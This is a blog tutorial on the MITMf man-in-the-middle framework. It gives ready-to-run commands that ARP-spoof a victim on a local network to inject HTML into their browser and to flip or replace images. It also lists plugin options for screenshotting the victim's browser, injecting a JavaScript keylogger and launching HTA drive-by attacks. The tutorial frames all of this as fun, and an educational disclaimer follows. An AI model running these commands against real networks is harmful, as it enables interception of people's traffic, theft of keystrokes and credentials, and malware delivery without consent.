Man-In-The-Middle Attack Framework: MITMf

MITMf is a Framework for Man-In-The-Middle attacks. MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.

Originally built to address the significant shortcomings of other tools (e.g Ettercap, Mallory), it's been almost completely re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.

MITMf is available with Kali Linux. It can also be installed on any flavour of linux. To install MITMf kindly follow the process available at https://github.com/byt3bl33d3r/MITMf/wiki/Installation

MITMf is a simple to use command line attack tool. This article presents some example which can be a real fun ;). Use it at your own risk.

Inject html page in victims browser

Create a index.html in your root folder and ...

root@debian:~# cd /usr/share/mitmf/  
root@debian:/usr/share/mitmf# python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.9 --inject --html-file /root/index.html  

The above example will injects this index.html in the victims(192.168.1.9 in this example) browser whenever he is viewing some http(not https) website.

  • -i is for the interface (wlan0 in this example)
  • --spoof Loads plugin 'Spoof'
  • --arp Redirect traffic using ARP spoofing
  • --gateway GATEWAYSpecify the gateway IP on your network.
  • --targets TARGETS Specify host/s to poison [if ommited will default to subnet]
  • --inject Load plugin 'Inject' to inject index.html

Note: arp spoof attack intercepts the traffic between the gateway (or router) and the target (192.168.1.9). All traffic thats going from victim to gateway now goes through the attackers system.

Make images look upside-down

This is real fun. Whatever http websites the victim is viewing, all images appearing on the pages will be flipped to 180 degrees.

root@debian:/usr/share/mitmf# python mitmf.py -i eth0 --spoof --arp --gateway 192.168.8.1 --target 192.168.8.100 --upsidedownternet

Replace images (Image Randomiser)

Image randomiser MITMf plugin replaces images in the victims browsers with a random one from a specified directory (/root/Pictures/ in this example).

root@debian:/usr/share/mitmf# python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.9 --imgrand --img-dir /root/Pictures/  

Other Plugins

There are many other plugins available with MITMf you can play with.

  • To take a screenshot of victims browser
ScreenShotter:  
Uses HTML5 Canvas to render an accurate screenshot of a clients browser

--screen Load plugin 'ScreenShotter'
--interval SECONDS Interval at which screenshots will be taken (default 10 seconds)
  • Injects a javascript keylogger into victims webpages
--jskeylogger Load plugin 'JSKeylogger'
  • Performs HTA drive-by attacks on victim
--hta Load plugin 'HTA Drive-By'
--text TEXT Text to display on notification bar
--hta-app HTA_APP Path to HTA application [defaults to config/hta_driveby/flash_setup.hta]

Have fun, be safe :)

Disclaimer

Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors and http://googlinux.com will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.

This site contains materials that can be potentially damaging or dangerous. If you do not fully understand something on this site, then GO OUT OF HERE! Refer to the laws in your province/country before accessing, using,or in any other way utilizing these materials.These materials are for educational and research purposes only.Do not attempt to violate the law with anything contained here. If this is your intention, then LEAVE NOW! Neither administration of this server, the authors of this material, or anyone else affiliated in any way, is going to accept responsibility for your actions. Neither the creator nor GoogLinux is responsible for the comments posted on this website.


Like it? Click here to Tweet your feedback

Harsh Khandelwal

Engineering Student at SRM University, Chennai India. Holding Certification like CEH, CHFI, ENSA & RHCSA.